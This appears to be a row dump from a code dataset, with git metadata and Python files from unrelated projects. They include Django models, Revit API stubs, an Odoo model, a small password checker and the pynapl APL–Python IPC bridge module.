blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
75992c9a0e42e4745e9398c401ddc46138b57440
|
00019f515ebf7fad88a95b4c4c31c8674744ae89
|
/menu.py
|
c93efcff1beae555745ba79efc5b82db9bcf6522
|
[] |
no_license
|
realtuna90/python
|
25a10755114373c352e4b45bc946f3e2448dba8b
|
052e2ec03be4d1edc7091b37186491110e10a090
|
refs/heads/master
| 2020-11-26T04:03:33.231759
| 2019-12-19T08:11:45
| 2019-12-19T08:11:45
| 228,960,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 653
|
py
|
# 랜덤으로 오늘의 점심메뉴를 추천해주는 프로그램
import random
menu = ['새마을식당', '초원삼겹살', '멀캠20층', '홍콩반점', '순남시래기']
phone_book = {
'새마을식당':'010-1234-1123',
'초원삼겹살':'02-000-0012',
'멀캠20층':'02-856-4441',
'홍콩반점':'02-225-3221',
'순남시래기':'02-111-2222'
}
# print(phone_book['새마을식당'])
# menu의 요소 중 랜덤으로 골라서 lunch라고 하는 변수에 담아주세요
# 실습 : 랜덤으로 고른 식당과 해당식당의 전화번호를 출력
lunch = random.choice(menu)
print(lunch)
print(phone_book[lunch])
|
[
"kms3357@gmail.com"
] |
kms3357@gmail.com
|
fc410463edafcd6936bcce7eaa7410a60db73512
|
0bf283bdae8eb92d6c1dcb321ae7160727ac5e69
|
/src/university_dashboard/models.py
|
d3ed8c1ea928d95fcea3439dc21acba498c5f500
|
[] |
no_license
|
LuisBosquez/student-net-2015
|
5175197daf7f797f812b7212e7818eb742d8d119
|
c4059e06b25bbcb8a0e73dde976b50d1127a11a4
|
refs/heads/master
| 2020-03-30T12:53:34.618913
| 2015-03-27T20:33:50
| 2015-03-27T20:33:50
| 31,245,105
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,772
|
py
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
# Create your models here, yo!
class University(models.Model):
SUPPORTED_LANGUAGE_CHOICES = (
('EN', 'English'),
('ES', 'Spanish'),
('FR', 'French')
)
name = models.CharField(max_length = 200, default = "Some university")
location = models.CharField(max_length = 200)
language = models.CharField(max_length = 2, choices = SUPPORTED_LANGUAGE_CHOICES)
memberSince = models.DateTimeField('Date Joined', default = timezone.now())
def __str__(self):
return self.name
class StudentGroup(models.Model):
STUDENT_GROUP_CATEGORY_CHOICES = (
('MJ', 'Major'),
('RA', 'Recreational Activty'),
('MS', 'Miscellaneous')
)
university = models.ForeignKey(University)
name = models.CharField(max_length = 200, default = "Some student group name")
description = models.TextField('Description', default = "Some student group")
category = models.CharField(max_length = 200, default="None specified", choices = STUDENT_GROUP_CATEGORY_CHOICES)
memberSince = models.DateTimeField('Date Joined', default=timezone.now())
def __str__(self):
return self.name
class Student(models.Model):
STUDENT_MAJOR_CHOICES = (
('CS', 'Computer Science'),
('EC', 'Economics'),
('FI', 'Finance'),
('MK', 'Marketing')
)
university = models.ForeignKey(University)
studentGroup = models.ForeignKey(StudentGroup)
name = models.CharField(max_length = 200, default="Some student")
email = models.CharField(max_length = 200, default = "email@university.edu")
major = models.CharField(max_length = 200, choices = STUDENT_MAJOR_CHOICES)
profile_picture = models.ImageField(upload_to='thumbpath', blank=True)
def __str__(self):
return self.name
|
[
"luisdbosquez@gmail.com"
] |
luisdbosquez@gmail.com
|
c86acafbece5cdbeba0a0ae5f5a5532416a95b1e
|
0be246ab3744f6cd6e1858c61850a39fdc03480c
|
/infoSys/migrations/0004_auto_20181202_0037.py
|
cfc1e9d33cc4040f05397ae9c6fba1927b1c41a4
|
[] |
no_license
|
DDDDanny/InfoManSys
|
5225f58f2e53f9b154ba32de515d241336cea6ec
|
dede518fd5f8b5c35019e7ff9cb5ab868365e11f
|
refs/heads/master
| 2020-04-11T12:56:27.851849
| 2019-01-06T07:55:53
| 2019-01-06T07:55:53
| 161,797,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
# Generated by Django 2.0.7 on 2018-12-01 16:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('infoSys', '0003_auto_20181201_1847'),
]
operations = [
migrations.AlterField(
model_name='projectinfo',
name='pro_time',
field=models.DateTimeField(auto_now_add=True, verbose_name='创建时间'),
),
]
|
[
"707956456@qq.com"
] |
707956456@qq.com
|
84cac4a3ec870cf2d3aadf5595ef0e5b0c116d8f
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs.min/Autodesk/Revit/UI/Plumbing.py
|
4d2f1c615c504ceda8bcf1bd0cf231a9e5310a56
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,914
|
py
|
# encoding: utf-8
# module Autodesk.Revit.UI.Plumbing calls itself Plumbing
# from RevitAPIUI,Version=17.0.0.0,Culture=neutral,PublicKeyToken=null
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class IPipeFittingAndAccessoryPressureDropUIServer(IExternalServer):
""" Interface for external servers providing optional UI for pipe fitting and pipe accessory coefficient calculation. """
def GetDBServerId(self):
"""
GetDBServerId(self: IPipeFittingAndAccessoryPressureDropUIServer) -> Guid
Returns the Id of the corresponding DB server for which this server provides an
optional UI.
Returns: The Id of the DB server.
"""
pass
def ShowSettings(self,data):
"""
ShowSettings(self: IPipeFittingAndAccessoryPressureDropUIServer,data: PipeFittingAndAccessoryPressureDropUIData) -> bool
Shows the settings UI.
data: The input data of the calculation.
Returns: True if the user makes any changes in the UI,false otherwise.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class PipeFittingAndAccessoryPressureDropUIData(object,IDisposable):
""" The input and output data used by external UI servers for storing UI settings. """
def Dispose(self):
""" Dispose(self: PipeFittingAndAccessoryPressureDropUIData) """
pass
def GetUIDataItems(self):
"""
GetUIDataItems(self: PipeFittingAndAccessoryPressureDropUIData) -> IList[PipeFittingAndAccessoryPressureDropUIDataItem]
Gets all UI data items stored in the UI data.
Returns: An array of UI data items.
"""
pass
def GetUnits(self):
"""
GetUnits(self: PipeFittingAndAccessoryPressureDropUIData) -> Units
Gets units.
Returns: The Units object.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIData,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIData) -> bool
"""
class PipeFittingAndAccessoryPressureDropUIDataItem(object,IDisposable):
""" The input and output data used by external UI servers for initializing and storing the UI settings. """
def Dispose(self):
""" Dispose(self: PipeFittingAndAccessoryPressureDropUIDataItem) """
pass
def GetEntity(self):
"""
GetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> Entity
Returns the entity set by UI server.
or an invalid entity otherwise.
Returns: The returned Entity.
"""
pass
def GetPipeFittingAndAccessoryData(self):
"""
GetPipeFittingAndAccessoryData(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> PipeFittingAndAccessoryData
Gets the fitting data stored in the UI data item.
Returns: The fitting data stored in the UI data item.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: PipeFittingAndAccessoryPressureDropUIDataItem,disposing: bool) """
pass
def SetEntity(self,entity):
"""
SetEntity(self: PipeFittingAndAccessoryPressureDropUIDataItem,entity: Entity)
Stores the entity in the UI data item.
entity: The Entity to be stored.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: PipeFittingAndAccessoryPressureDropUIDataItem) -> bool
"""
|
[
"gtalarico@gmail.com"
] |
gtalarico@gmail.com
|
d131a9517e2be365b1cd02a2b1ab8f0ab48be333
|
7cdd89eb118e2206e84ef7940d76e603ae8c8235
|
/checker/proverka.py
|
6bb170d41acae877ebee66cdb2f90e94630e66e6
|
[] |
no_license
|
ppofigist/juniors
|
ac5ba3cd780004cd18de5daa433a2bbc5abbe94a
|
873511fc163115113e8b87246fd6c0dbea49dd58
|
refs/heads/master
| 2022-05-27T02:52:52.224501
| 2020-04-28T06:33:05
| 2020-04-28T06:33:05
| 259,547,645
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
def proverka(password):
if len(password) < 6:
return 'Недопустимый пароль'
elif password.isdigit() or password.lower() or password.upper():
return 'Ненадежный пароль'
elif password.islower() or password.isupper():
return 'Слабый пароль'
return 'Надёжный пароль'
print(proverka('ABCDEgggghh228'))
|
[
"59957987+ppofigist@users.noreply.github.com"
] |
59957987+ppofigist@users.noreply.github.com
|
6c64f27a25fd5960f47fd053e2c459ca3460867a
|
fc7e54796bf63283c2edcba6796036a28c72fe73
|
/examples/amount.py
|
36cbc72a3ebaa974c3cad1fdea0e801a7c96f232
|
[
"MIT"
] |
permissive
|
Oukanina/tron-api-python
|
ef05c635e3b19cbef93edd5b5b9018615fdb3c43
|
8d6f8cf31bad328568c716a9d4cd8a09a6dd9257
|
refs/heads/master
| 2020-04-05T20:06:17.361215
| 2018-11-11T07:34:36
| 2018-11-11T07:34:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 369
|
py
|
from tronapi import Tron
from tronapi import HttpProvider
full_node = HttpProvider('https://api.trongrid.io')
solidity_node = HttpProvider('https://api.trongrid.io')
event_server = HttpProvider('https://api.trongrid.io')
tron = Tron(full_node,
solidity_node,
event_server)
tron.toSun(1)
# result: 1000000
tron.fromSun(1000000)
# result: 1
|
[
"steein.shamsudin@gmail.com"
] |
steein.shamsudin@gmail.com
|
839b94d4d8f8243f8a806580eb30dd9bd25e5f1e
|
3093520d03fb2701e97b60755dd55534efa8d6c6
|
/yoursite/manage.py
|
612e0a62379788b44b248284980f479cd8f7583f
|
[] |
no_license
|
bradwright/django-layout
|
6da01d613135ffa37a1b335f961a0e7e0d2c8baf
|
9b2fe6b862237217e56d00b1f634e15791a96b26
|
refs/heads/master
| 2020-04-10T16:54:26.939487
| 2009-08-29T08:41:14
| 2009-08-29T08:41:14
| 76,139
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
#!/usr/bin/env python
# Hack the Python path to add our `lib` as first in the search path
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../lib'))
# regular stuff carry on
from django.core.management import execute_manager
try:
import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write("Error: Can't find the file 'settings.py' in the directory containing %r. It appears you've customized things.\nYou'll have to run django-admin.py, passing it your settings module.\n(If the file settings.py does indeed exist, it's causing an ImportError somehow.)\n" % __file__)
sys.exit(1)
if __name__ == "__main__":
execute_manager(settings)
|
[
"brad@intranation.com"
] |
brad@intranation.com
|
cf3a580793ca0e8728627bee296bed9d125d4c34
|
195046153bf7c608d7919d0af9005467152ffb74
|
/tests/conftest.py
|
6725c9af6f914c1eda9304d17e74f2e622de7c6e
|
[
"MIT"
] |
permissive
|
adamchainz/time-machine
|
b72d1fb7f60b9f131ace8ea87820b07091fa1568
|
c59e60681b43d504c51b52a6b69ce73dbf9ad998
|
refs/heads/main
| 2023-09-04T06:32:02.228162
| 2023-08-29T16:07:17
| 2023-08-29T16:07:17
| 259,841,110
| 511
| 30
|
MIT
| 2023-09-14T14:22:22
| 2020-04-29T06:16:39
|
Python
|
UTF-8
|
Python
| false
| false
| 148
|
py
|
from __future__ import annotations
import os
import time
# Isolate tests from the host machine’s timezone
os.environ["TZ"] = "UTC"
time.tzset()
|
[
"noreply@github.com"
] |
adamchainz.noreply@github.com
|
a8882dbc39127e18c02e9ea41f7f4c2804e019d4
|
098019f7f1821f01348eaef351ff9770b13adab0
|
/models/product_supply.py
|
c6b642e79ddbcc19a304d96e70fb67972c68f5ca
|
[] |
no_license
|
zyn1030z/stock
|
476b553c444b275543831197b72be75b1683efa9
|
2413bf52fdef6170b10f4e4f1cdade0bb9f75160
|
refs/heads/master
| 2023-05-04T08:21:36.131005
| 2021-05-27T09:59:00
| 2021-05-27T09:59:00
| 371,326,253
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
from odoo import models, fields
class product(models.Model):
_inherit = 'product.template'
supply_type = fields.Selection([
('warehouse', 'Kho tổng'),
('purchase', 'Thu mua')],
string='Thông tin danh mục hàng hóa', default='warehouse', track_visibility='always', required=True)
|
[
"thaihung412@gmail.com"
] |
thaihung412@gmail.com
|
c49013f41c7b5be215579b86518c5d6fe10595f7
|
166cd1643da77c169eff2cfd6a9b989e1d193417
|
/pynapl/APLPyConnect.py
|
d3a5517c79cea8a6ab56165e7c51ab2f9fc03d81
|
[
"MIT"
] |
permissive
|
Dyalog/pynapl
|
0123bee9036cea04ccfa145cae8287a64b928374
|
7e47c04711a3f4d0c3587fb428f3aefe736006fb
|
refs/heads/master
| 2022-09-22T07:25:44.821175
| 2022-08-31T10:47:23
| 2022-08-31T10:47:23
| 102,481,506
| 70
| 14
|
MIT
| 2022-08-31T10:47:24
| 2017-09-05T12:59:25
|
Python
|
UTF-8
|
Python
| false
| false
| 22,587
|
py
|
# APLPyConnect
# -*- coding: utf-8 -*-
# This module handles the passing of messages between the APL side and the Python side
# The format of a message is:
# 0 1 2 3 4 ......
# TYPE SIZE (big-endian) MESSAGE (`size` bytes, expected to be UTF-8 encoded)
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
import socket, os, time, types, signal, select, sys, json
import tempfile, platform
from . import RunDyalog, Interrupt, WinDyalog, IPC
from .Array import *
from .PyEvaluator import PyEvaluator
from .ObjectWrapper import *
# in Python 2, set string types to be their Python 3 equivalents
if sys.version_info.major == 2:
bytes, str = str, unicode
# in Python 3, allow use of long
if sys.version_info.major >= 3:
long = int
# in Python 2, sockets give bytes as ASCII characters.
# in Python 3, sockets give either Unicode or bytes as ints.
def maybe_ord(item):
if type(item) in (int,long):
return item
else:
return ord(item)
# these fail when threaded, but that's OK
def ignoreInterrupts():
try: return signal.signal(signal.SIGINT, signal.SIG_IGN)
except ValueError: return None # (not on main thread)
def allowInterrupts():
try: return signal.signal(signal.SIGINT, signal.default_int_handler)
except ValueError: return None # pass (not on main thread)
def setInterrupts(x):
if x==None: return None
try: return signal.signal(signal.SIGINT, x)
except ValueError: return None # pass (not on main thread)
class APLError(Exception):
def __init__(self, message="", jsobj=None):
self.dmx = None
# if a JSON object is given, use that
if not jsobj is None:
if type(jsobj) is bytes: jsobj=str(jsobj, 'utf-8')
errobj = json.loads(jsobj)
message = errobj['Message']
if 'DMX' in errobj:
self.dmx = errobj['DMX']
if 'Message' in self.dmx and self.dmx['Message'].strip():
message += ': ' + self.dmx['Message']
# if on Python 3 and these are bytes, convert to unicode
if sys.version_info.major >= 3 and type(message) is bytes:
Exception.__init__(self, str(message, 'utf-8'))
else:
Exception.__init__(self, message)
class MalformedMessage(Exception): pass
class Message(object):
"""A message to be sent to the other side"""
OK=0 # sent as response to message that succeeded but returns nothing
PID=1 # initial message containing PID
STOP=2 # break the connection
REPR=3 # evaluate expr, return repr (for debug)
EXEC=4 # execute statement(s), return OK or ERR
REPRRET=5 # return from "REPR"
EVAL=10 # evaluate a Python expression, including arguments, with APL conversion
EVALRET=11 # message containing the result of an evaluation
DBGSerializationRoundTrip = 253 #
ERR=255 # Python error
MAX_LEN = 2**32-1
def __init__(self, mtype, mdata):
"""Initialize a message"""
self.type = mtype
self.data = mdata
if type(self.data) is str:
self.data = self.data.encode("utf8")
if len(self.data) > Message.MAX_LEN:
raise ValueError("message body exceeds maximum length")
def send(self, writer):
"""Send a message using a writer"""
# turn off interrupt signal handler temporarily
s = None
# this fails under Python 3 if it happens during shutdown
# the workaround is to just ignore it in that case
# the error claims SIG_IGN isn't a valid signal
try:
s = signal.signal(signal.SIGINT, signal.SIG_IGN)
except (TypeError, ValueError):
pass
try:
b4 = (len(self.data) & 0xFF000000) >> 24
b3 = (len(self.data) & 0x00FF0000) >> 16
b2 = (len(self.data) & 0x0000FF00) >> 8
b1 = (len(self.data) & 0x000000FF) >> 0
# Python 2 and 3 handle this differently
# Annoyingly enough, the newest Python 3 (.6) has added support for this back in,
# but we can't expect that version to be present just yet
if sys.version_info.major == 2:
writer.write(b"%c%c%c%c%c%s" % (self.type,b4,b3,b2,b1,self.data))
else:
writer.write(bytes([self.type,b4,b3,b2,b1]))
writer.write(self.data)
writer.flush()
finally:
if s: signal.signal(signal.SIGINT, s)
@staticmethod
def recv(reader,block=True):
"""Read a message from a reader.
If block is set to False, then it will return None if no message is
available, rather than wait until one comes in.
"""
s = None
setsgn = False
try:
if block:
# wait for message available
while True:
if reader.avail(0.1): break
else:
# if no message available, return None
if not reader.avail(0.1): return None
# once we've started reading, finish reading: turn off the interrupt handler
try:
s, setsgn = signal.signal(signal.SIGINT, signal.SIG_IGN), True
except ValueError:
pass # we're not on the main thread, so no signaling at all
# read the header
try:
inp = reader.read(1)
mtype = maybe_ord(inp)
lfield = list(map(maybe_ord, reader.read(4)))
length = (lfield[0]<<24) + (lfield[1]<<16) + (lfield[2]<<8) + lfield[3]
except (TypeError, IndexError, ValueError):
raise MalformedMessage("out of data while reading message header")
# read the data
try:
data = reader.read(length)
except ValueError:
raise MalformedMessage("out of data while reading message body")
if len(data) != length:
raise MalformedMessage("out of data while reading message body")
return Message(mtype, data)
finally:
# turn the interrupt handler back on if we'd turned it off
if setsgn:
signal.signal(signal.SIGINT, s)
class Connection(object):
"""A connection"""
class APL(object):
"""Represents the APL interpreter."""
pid=None
DEBUG=False
store=None
def __init__(self, conn):
self.store = ObjectStore()
self.conn=conn
self.ops=0 # keeps track of how many operators have been defined
def obj(self, obj):
"""Wrap an object so it can be sent to APL."""
return ObjectWrapper(self.store, obj)
def _access(self, ref):
"""Called by the APL side to access a Python object"""
return self.store.retrieve(ref)
def _release(self, ref):
"""Called by the APL side to release an object it has sent."""
self.store.release(ref)
def stop(self):
"""If the connection was initiated from the Python side, this will close it."""
if not self.pid is None:
# already killed it? (destructor might call this function after the user has called it as well)
if not self.pid:
return
try: Message(Message.STOP, "STOP").send(self.conn.outfile)
except (ValueError, AttributeError): pass # if already closed, don't care
# close the pipes
try:
self.conn.infile.close()
self.conn.outfile.close()
except:
pass # we're gone anyway
# give the APL process half a second to exit cleanly
time.sleep(.5)
if not self.DEBUG:
try: os.kill(self.pid, 15) # SIGTERM
except OSError: pass # just leak the instance, it will be cleaned up once Python exits
self.pid=0
else:
raise ValueError("Connection was not started from the Python end.")
def __del__(self):
if self.pid: self.stop()
def fn(self, aplfn, raw=False):
"""Expose an APL function to Python.
The result will be considered niladic if called with no arguments,
monadic if called with one and dyadic if called with two.
If "raw" is set, the return value will be given as an APLArray rather
than be converted to a 'suitable' Python representation.
"""
if not type(aplfn) is str:
aplfn = str(aplfn, "utf-8")
def __fn(*args):
if len(args)==0: return self.eval(aplfn, raw=raw)
if len(args)==1: return self.eval("(%s)⊃∆"%aplfn, args[0], raw=raw)
if len(args)==2: return self.eval("(⊃∆)(%s)2⊃∆"%aplfn, args[0], args[1], raw=raw)
return APLError("Function must be niladic, monadic or dyadic.")
# op can use this for an optimization
__fn.aplfn = aplfn
return __fn
def op(self, aplop):
"""Expose an APL operator.
It can be called with either 1 or 2 arguments, depending on whether the
operator is monadic or dyadic. The arguments may be values or Python
functions.
If the Python function was created using apl.fn, this is recognized
and the function is run in APL directly.
"""
if not type(aplop) is str:
aplop = str(aplop, "utf-8")
def storeArgInWs(arg,nm):
wsname = "___op%d_%s" % (self.ops, nm)
if type(arg) is types.FunctionType \
or type(arg) is types.BuiltinFunctionType:
# it is a function
if hasattr(arg,'__dict__') and 'aplfn' in arg.__dict__:
# it is an APL function
self.eval("%s ← %s⋄⍬" % (wsname, arg.aplfn))
else:
# it is a Python function
# store it under this name
self.__dict__[wsname] = arg
# make it available to APL
self.eval("%s ← (py.PyFn'APL.%s').Call⋄⍬" % (wsname, wsname))
else:
# it is a value
self.eval("%s ← ⊃∆" % wsname, arg)
return wsname
def __op(aa, ww=None, raw=False):
# store the arguments into APL at the time that the operator is defined
wsaa = storeArgInWs(aa, "aa")
aplfn = "((%s)(%s))" % (wsaa, aplop)
# . / ∘. must be special-cased
if aplop in [".","∘."]: aplfn='(∘.(%s))' % wsaa
if not ww is None:
wsww = storeArgInWs(ww, "ww")
aplfn = "((%s)%s(%s))" % (wsaa, aplop, wsww)
# again, . / ∘. must be special-cased
if aplop in [".","∘."]: aplfn='((%s).(%s))' % (wsaa, wsww)
def __fn(*args):
# an APL operator can't return a niladic function
if len(args)==0: raise APLError("A function derived from an APL operator cannot be niladic.")
if len(args)==1: return self.eval("(%s)⊃∆"%aplfn, args[0], raw=raw)
if len(args)==2: return self.eval("(⊃∆)(%s)2⊃∆"%aplfn, args[0], args[1], raw=raw)
raise APLError("Function must be monadic or dyadic.")
__fn.aplfn = aplfn
self.ops+=1
return __fn
return __op
def interrupt(self):
"""Send a strong interrupt to the Dyalog interpreter."""
if self.pid:
Interrupt.interrupt(self.pid)
def tradfn(self, tradfn):
"""Define a tradfn or tradop on the APL side.
Input must be string, the lines of which will be passed to ⎕FX."""
Message(Message.EXEC, tradfn).send(self.conn.outfile)
reply = self.conn.expect(Message.OK)
if reply.type == Message.ERR:
raise APLError(jsobj=str(reply.data,'utf-8'))
else:
return self.fn(str(reply.data,'utf-8'))
def repr(self, aplcode):
"""Run an APL expression, return string representation"""
# send APL message
Message(Message.REPR, aplcode).send(self.conn.outfile)
reply = self.conn.expect(Message.REPRRET)
if reply.type == Message.ERR:
raise APLError(jsobj=str(reply.data,'utf-8'))
else:
return reply.data
def fix(self, code):
"""2⎕FIX an APL script. It will become available in the workspace.
Input may be a string or a list."""
# implemented using eval
if not type(code) is str:
code = str(code, 'utf-8')
if not type(code) is list:
code = code.split("\n") # luckily APL has no multiline strings
return self.eval("2⎕FIX ∆", *code)
def eval(self, aplexpr, *args, **kwargs):
"""Evaluate an APL expression. Any extra arguments will be exposed
as an array ∆. If `raw' is set, the result is not converted to a
Python representation."""
if not type(aplexpr) is str:
# this should be an UTF-8 string
aplexpr=str(aplexpr, "utf8")
# normalize (remove superfluous whitespace and newlines, add in ⋄s where
# necessary)
aplexpr = '⋄'.join(x.strip() for x in aplexpr.split("\n") if x.strip()) \
.replace('{⋄','{').replace('⋄}','}') \
.replace('(⋄','(').replace('⋄)',')')
payload = APLArray.from_python([aplexpr, args], apl=self).toJSONString()
Message(Message.EVAL, payload).send(self.conn.outfile)
reply = self.conn.expect(Message.EVALRET)
if reply.type == Message.ERR:
raise APLError(jsobj=reply.data)
answer = APLArray.fromJSONString(reply.data)
if 'raw' in kwargs and kwargs['raw']:
return answer
else:
return answer.to_python(self)
@staticmethod
def APLClient(DEBUG=False, dyalog=None, forceTCP=False):
"""Start an APL client. This function returns an APL instance."""
# if on Windows, use TCP always
if os.name=='nt' or 'CYGWIN' in platform.system():
forceTCP=True
if forceTCP:
# use TCP
inpipe = outpipe = IPC.TCPIO() # TCP connection is bidirectional
outarg = 'TCP'
inarg = str(inpipe.startServer())
else:
# make two named pipes
inpipe = IPC.FIFO()
outpipe = IPC.FIFO()
inarg = inpipe.name
outarg = outpipe.name
if DEBUG:
print("in: ",inarg)
print("out: ",outarg)
# start up Dyalog
if not DEBUG: RunDyalog.dystart(outarg, inarg, dyalog=dyalog)
if forceTCP:
# wait for Python to make the connection
inpipe.acceptConnection()
else:
# start the writer first
outpipe.openWrite()
inpipe.openRead()
if DEBUG:print("Waiting for PID...")
connobj = Connection(inpipe, outpipe, signon=False)
# ask for the PID
pidmsg = connobj.expect(Message.PID)
if pidmsg.type==Message.ERR:
raise APLError(pidmsg.data)
else:
pid=int(pidmsg.data)
if DEBUG:print("Ok! pid=%d" % pid)
apl = connobj.apl
apl.pid = pid
apl.DEBUG=DEBUG
# if we are on Windows, hide the window
if os.name=='nt': WinDyalog.hide(pid)
return apl
def __init__(self, infile, outfile, signon=True):
self.infile=infile
self.outfile=outfile
self.apl = Connection.APL(self)
self.isSlave = False
if signon:
Message(Message.PID, str(os.getpid())).send(self.outfile)
self.isSlave = True
def runUntilStop(self):
"""Receive messages and respond to them until STOP is received.
"""
self.stop = False
while not self.stop:
sig = ignoreInterrupts()
# is there a message available?
msg = Message.recv(self.infile, block=False)
setInterrupts(sig)
if not msg is None:
# yes, respond to it
self.respond(msg)
def expect(self, msgtype):
"""Expect a certain type of message. If such a message or an error
is received, return it; if a different message is received, then
handle it and go back to waiting for the right type of message."""
while True:
s = None
try:
# only turn off interrupts if the APL side is in control
if self.isSlave: s = ignoreInterrupts()
msg = Message.recv(self.infile)
if msg.type in (msgtype, Message.ERR):
return msg
else:
if self.isSlave: allowInterrupts()
self.respond(msg)
except KeyboardInterrupt:
self.apl.interrupt()
finally:
if self.isSlave: setInterrupts(s)
pass
def respond(self, message):
# Add ctrl+c signal handling
try:
self.respond_inner(message)
except KeyboardInterrupt:
# If there is an interrupt during 'respond', then that means
# the Python side was interrupted, and we need to tell the
# APL this.
Message(Message.ERR, "Interrupt").send(self.outfile)
def respond_inner(self, message):
"""Respond to a message"""
t = message.type
if t==Message.OK:
# return 'OK' to such messages
Message(Message.OK, message.data).send(self.outfile)
elif t==Message.PID:
# this is interpreted as asking for the PID
Message(Message.PID, str(os.getpid())).send(self.outfile)
elif t==Message.STOP:
# send a 'STOP' back in acknowledgement and set the stop flag
self.stop = True
Message(Message.STOP, "STOP").send(self.outfile)
elif t==Message.REPR:
# evaluate the input and send the Python representation back
try:
val = repr(eval(message.data))
Message(Message.REPRRET, val).send(self.outfile)
except Exception as e:
Message(Message.ERR, repr(e)).send(self.outfile)
elif t==Message.EXEC:
# execute some Python code in the global context
sig = None
try:
sig = allowInterrupts()
script = message.data
if type(script) is bytes:
script = str(script, 'utf-8')
PyEvaluator.executeInContext(script, self.apl)
Message(Message.OK, '').send(self.outfile)
except Exception as e:
Message(Message.ERR, repr(e)).send(self.outfile)
finally:
setInterrupts(sig)
elif t==Message.EVAL:
# evaluate a Python expression with optional arguments
# expected input: APLArray, first elem = expr string, 2nd elem = arguments
# output, if not an APLArray already, will be automagically converted
sig = None
try:
sig = allowInterrupts()
val = APLArray.fromJSONString(message.data)
# unpack code
if val.rho != [2]:
raise MalformedMessage("EVAL expects a ⍴=2 array, but got: %s" % repr(val.rho))
if not isinstance(val[[0]], APLArray):
raise MalformedMessage("First argument must contain code string.")
code = val[[0]].to_python(self.apl)
if not type(code) in (str,bytes):
raise MalformedMessage("Code element must be a string, but got: %s" % repr(code))
# unpack arguments
args = val[[1]]
if not isinstance(val[[1]], APLArray) \
or len(val[[1]].rho) != 1:
raise MalformedMessage("Argument list must be rank-1 array.")
result = PyEvaluator(code, args, self).go().toJSONString()
Message(Message.EVALRET, result).send(self.outfile)
except Exception as e:
#raise
Message(Message.ERR, repr(e)).send(self.outfile)
finally:
setInterrupts(sig)
elif t==Message.DBGSerializationRoundTrip:
# this is a debug message. Deserialize the contents, print them to stdout, reserialize and send back
try:
print("Received data: ", message.data)
print("---------------")
aplarr = APLArray.fromJSONString(message.data)
serialized = aplarr.toJSONString()
print("Sending back: ", serialized)
print("---------------")
Message(Message.DBGSerializationRoundTrip, serialized).send(self.outfile)
except Exception as e:
Message(Message.ERR, repr(e)).send(self.outfile)
else:
Message(Message.ERR, "unknown message type #%d / data:%s"%(message.type,message.data)).send(self.outfile)
